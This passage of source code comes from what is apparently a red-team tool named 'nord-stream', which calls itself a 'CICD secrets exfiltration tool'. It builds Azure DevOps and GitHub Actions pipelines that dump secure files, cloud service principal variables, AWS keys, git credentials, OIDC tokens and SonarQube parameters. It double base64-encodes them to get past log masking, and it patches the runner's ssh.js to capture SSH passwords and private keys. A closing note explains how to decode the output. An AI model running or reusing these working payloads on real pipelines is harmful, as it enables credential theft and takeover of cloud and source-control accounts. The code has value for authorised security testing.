"name": "secretFile", "inputs": {"secureFile": secureFile}, }) if os == "windows": self._defaultTemplate["steps"].append({ "task": "PowerShell@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": self._get_ps_b64_script('$output = Get-Content -Path "$(secretFile.secureFilePath)" -Raw') } }) else: self._defaultTemplate["steps"].append({ "script": "cat $(secretFile.secureFilePath) | base64 -w0 | base64 -w0; echo", "displayName": self.taskName, }) def generatePipelineForAzureRm(self, azureSubscription, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) step = { "task": "AzureCLI@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "addSpnToEnvironment": True, "scriptLocation": "inlineScript", "azureSubscription": azureSubscription, }, } if os == "windows": step["inputs"]["scriptType"] = "pscore" step["inputs"]["inlineScript"] = self._get_ps_b64_script( '$output = (Get-ChildItem Env: | Where-Object Name -match "servicePrincipal" | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join "`n"' ) else: step["inputs"]["scriptType"] = "bash" step["inputs"]["inlineScript"] = 'sh -c "env | grep \\"^servicePrincipal\\" | base64 -w0 | base64 -w0; echo ;"' self._defaultTemplate["steps"].append(step) def generatePipelineForGitHub(self, endpoint, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) self._defaultTemplate["resources"] = { "repositories": [{ "repository": "devRepo", "type": "github", "endpoint": endpoint, "name": "github/g-emoji-element", }] } self._defaultTemplate["steps"].append({"checkout": "devRepo", "persistCredentials": True}) if os == "windows": self._defaultTemplate["steps"].append({ "task": "PowerShell@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": self._get_ps_b64_script('$output = Get-Content -Path ".\\.git\\config" -Raw') } }) else: self._defaultTemplate["steps"].append({ "task": "Bash@3", "displayName": self.taskName, "inputs": { 
"targetType": "inline", "script": 'sh -c "cat ./.git/config | base64 -w0 | base64 -w0; echo ;"', }, }) def generatePipelineForAWS(self, awsCredentials, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) if os == "windows": self._defaultTemplate["steps"].append({ "task": "AWSPowerShellModuleScript@1", "displayName": self.taskName, "inputs": { "awsCredentials": awsCredentials, "scriptType": "inline", "inlineScript": self._get_ps_b64_script( '$output = (Get-ChildItem Env: | Where-Object Name -match "AWS_SECRET_ACCESS_KEY|AWS_ACCESS_KEY_ID" | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join "`n"' ) } }) else: self._defaultTemplate["steps"].append({ "task": "AWSShellScript@1", "displayName": self.taskName, "inputs": { "awsCredentials": awsCredentials, "scriptType": "inline", "inlineScript": 'sh -c "env | grep -E \\"(AWS_SECRET_ACCESS_KEY|AWS_ACCESS_KEY_ID)\\" | base64 -w0 | base64 -w0; echo ;"', }, }) def generatePipelineForSonar(self, sonarSCName, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) self._defaultTemplate["steps"].append({ "task": "SonarQubePrepare@6", "inputs": {"SonarQube": sonarSCName, "scannerMode": "CLI", "projectKey": "sonarqube"}, }) if os == "windows": self._defaultTemplate["steps"].append({ "task": "PowerShell@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": self._get_ps_b64_script( '$output = (Get-ChildItem Env: | Where-Object Name -match "SONARQUBE_SCANNER_PARAMS" | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join "`n"' ) } }) else: self._defaultTemplate["steps"].append({ "task": "Bash@3", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": "sh -c 'env | grep SONARQUBE_SCANNER_PARAMS | base64 -w0 | base64 -w0; echo ;'", }, }) def generatePipelineForSSH(self, sshSCName, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) self._defaultTemplate["steps"].append({"checkout": "none"}) if os == "windows": self._defaultTemplate["steps"].extend([ { "task": "PowerShell@2", "continueOnError": True, "inputs": { "targetType": "inline", "script": 'Get-ChildItem -Path "D:\\a\\" -Recurse -Filter "ssh.js" | ForEach-Object { $p = $_.FullName; copy $p ($p+".bak"); (Get-Content -Path $p -Raw) -replace [regex]::Escape(\'const readyTimeout = getReadyTimeoutVariable();\'), \'const readyTimeout = getReadyTimeoutVariable();const fs = require("fs");var data = "";data += hostname + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("artefacts.tar.gz", data, (err) => {});\' | Set-Content -Path $p }', }, }, { "task": "SSH@0", "continueOnError": True, "inputs": {"sshEndpoint": sshSCName, "runOptions": "commands", "commands": "sleep 1"}, }, { "task": "PowerShell@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": 'Get-ChildItem -Path "D:\\a\\" -Recurse -Filter "ssh.js" | ForEach-Object { $p = $_.FullName; mv -force ($p+".bak") $p ;}; $encodedOnce = [Convert]::ToBase64String([IO.File]::ReadAllBytes("artefacts.tar.gz"));$encodedTwice = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($encodedOnce));echo $encodedTwice; echo \'\'; rm artefacts.tar.gz;', }, }, ]) else: self._defaultTemplate["steps"].extend([ { "script": 'SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js) ; cp $SSH_FILE $SSH_FILE.bak ; sed -i \'s|const readyTimeout = getReadyTimeoutVariable();|const readyTimeout = getReadyTimeoutVariable();\\nconst fs = require("fs");var data = "";data += 
hostname + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("/tmp/artefacts.tar.gz", data, (err) => {});|\' $SSH_FILE', "displayName": f"Preparing {self.taskName}", }, { "task": "SSH@0", "continueOnError": True, "inputs": {"sshEndpoint": sshSCName, "runOptions": "commands", "commands": "sleep 1"}, }, { "script": "SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js); mv $SSH_FILE.bak $SSH_FILE ; cat /tmp/artefacts.tar.gz | base64 -w0 | base64 -w0 ; echo ''; rm /tmp/artefacts.tar.gz", "displayName": self.taskName, }, ]) ================================================ FILE: nordstream/yaml/generator.py ================================================ import yaml import logging from nordstream.utils.log import logger class YamlGeneratorBase: _defaultTemplate = "" @property def defaultTemplate(self): return self._defaultTemplate @defaultTemplate.setter def defaultTemplate(self, value): logger.warning("Using your own yaml template might break stuff.") self._defaultTemplate = value @staticmethod def getEnvironnmentFromYaml(yamlFile): with open(yamlFile, "r") as file: try: data = yaml.safe_load(file) return data.get("jobs").get("init").get("environment", None) except yaml.YAMLError as exception: logger.exception("YAML error") logger.exception(exception) def loadFile(self, file): logger.verbose("Loading YAML file.") with open(file, "r") as templateFile: try: self._defaultTemplate = yaml.load(templateFile, Loader=yaml.BaseLoader) except yaml.YAMLError as exception: logger.error("YAML error") logger.exception(exception) def writeFile(self, file): logger.verbose("Writing YAML file.") if logger.getEffectiveLevel() == logging.DEBUG: logger.debug("Current yaml file:") self.displayYaml() with open(file, "w") as outputFile: yaml.dump(self._defaultTemplate, outputFile, sort_keys=False) def displayYaml(self): logger.raw(yaml.dump(self._defaultTemplate, sort_keys=False), logging.INFO) ================================================ FILE: nordstream/yaml/github.py ================================================ from nordstream.utils.log import logger from nordstream.yaml.generator import YamlGeneratorBase class WorkflowGenerator(YamlGeneratorBase): _defaultTemplate = { "name": "GitHub Actions", "on": "push", "jobs": { "init": { "runs-on": "ubuntu-latest", "steps": [ { "run": "env -0 | awk -v RS='\\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0", "name": "command", "env": None, } ], } }, } _OIDCAzureTokenTemplate = { "name": "GitHub Actions", "on": "push", "permissions": {"id-token": "write", "contents": "read"}, "jobs": { "init": { "runs-on": "ubuntu-latest", "environment": None, "steps": [ { "name": "login", "uses": "azure/login@v1", "with": {"client-id": None, "tenant-id": None, "allow-no-subscriptions": True}, }, { "name": "command", "run": '(echo "Access token to use with Azure Resource Manager API:"; az account get-access-token; echo -e "\nAccess token to use with MS Graph API:"; az account get-access-token --resource-type ms-graph) | base64 -w0 | base64 -w0', }, ], } }, } _OIDCAWSTokenTemplate = { "name": "GitHub Actions", "on": "push", "permissions": {"id-token": "write", "contents": "read"}, "jobs": { "init": { "runs-on": "ubuntu-latest", "environment": None, "steps": [ { "name": "login", "uses": "aws-actions/configure-aws-credentials@v1-node16", "with": {"role-to-assume": None, "role-session-name": "oidcrolesession", "aws-region": None}, }, { "name": "command", "run": "sh -c 'env | grep \"^AWS_\" | base64 -w0 | base64 -w0'", }, ], } }, } def
generateWorkflowForSecretsExtraction(self, secrets, env=None): self.addSecretsToYaml(secrets) if env is not None: self.addEnvToYaml(env) def generateWorkflowForOIDCAzureTokenGeneration(self, tenant, subscription, client, env=None): self._defaultTemplate = self._OIDCAzureTokenTemplate self.addAzureInfoForOIDCToYaml(tenant, subscription, client) if env is not None: self.addEnvToYaml(env) def generateWorkflowForOIDCAWSTokenGeneration(self, role, region, env=None): self._defaultTemplate = self._OIDCAWSTokenTemplate self.addAWSInfoForOIDCToYaml(role, region) if env is not None: self.addEnvToYaml(env) def addEnvToYaml(self, env): try: self._defaultTemplate.get("jobs").get("init")["environment"] = env except TypeError as e: logger.exception(e) def getEnv(self): try: return self._defaultTemplate.get("jobs").get("init").get("environment", None) except TypeError as e: logger.exception(e) def addSecretsToYaml(self, secrets): self._defaultTemplate.get("jobs").get("init").get("steps")[0]["env"] = {} for sec in secrets: key = f"secret_{sec}" value = f"${{{{secrets.{sec}}}}}" self._defaultTemplate.get("jobs").get("init").get("steps")[0].get("env")[key] = value def addAzureInfoForOIDCToYaml(self, tenant, subscription, client): self._defaultTemplate["jobs"]["init"]["steps"][0]["with"]["tenant-id"] = tenant self._defaultTemplate["jobs"]["init"]["steps"][0]["with"]["client-id"] = client if subscription: self._defaultTemplate["jobs"]["init"]["steps"][0]["with"]["subscription-id"] = subscription def addAWSInfoForOIDCToYaml(self, role, region): self._defaultTemplate["jobs"]["init"]["steps"][0]["with"]["role-to-assume"] = role self._defaultTemplate["jobs"]["init"]["steps"][0]["with"]["aws-region"] = region ================================================ FILE: nordstream/yaml/gitlab.py ================================================ from nordstream.yaml.generator import YamlGeneratorBase class GitLabPipelineGenerator(YamlGeneratorBase): _defaultTemplate = {} ================================================ FILE: pyproject.toml ================================================ [build-system] requires = ["setuptools", "wheel"] build-backend = "setuptools.build_meta" [project] name = "nord-stream" version = "0.1.0" description = "CICD secrets exfiltration tool" authors = [{ name="@hugow" }, { name="@0hexit"}] license = { text = "GPL-3.0" } dependencies = ["docopt", "PyYAML", "requests", "rich"] [project.scripts] nord-stream = "nordstream.__main__:main" ================================================ FILE: requirements.txt ================================================ docopt PyYAML requests rich
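The workflow and pipeline payloads above consistently wrap their output in two rounds of Base64 ("base64 -w0 | base64 -w0", or the PowerShell equivalent in _get_ps_b64_script), presumably so that CI secret masking does not mangle the exfiltrated values. A minimal decoding sketch for a captured log line, assuming the blob is stored in `encoded`:

import base64

encoded = "<double-base64 blob copied from the run output>"
print(base64.b64decode(base64.b64decode(encoded)).decode("utf-8", errors="ignore"))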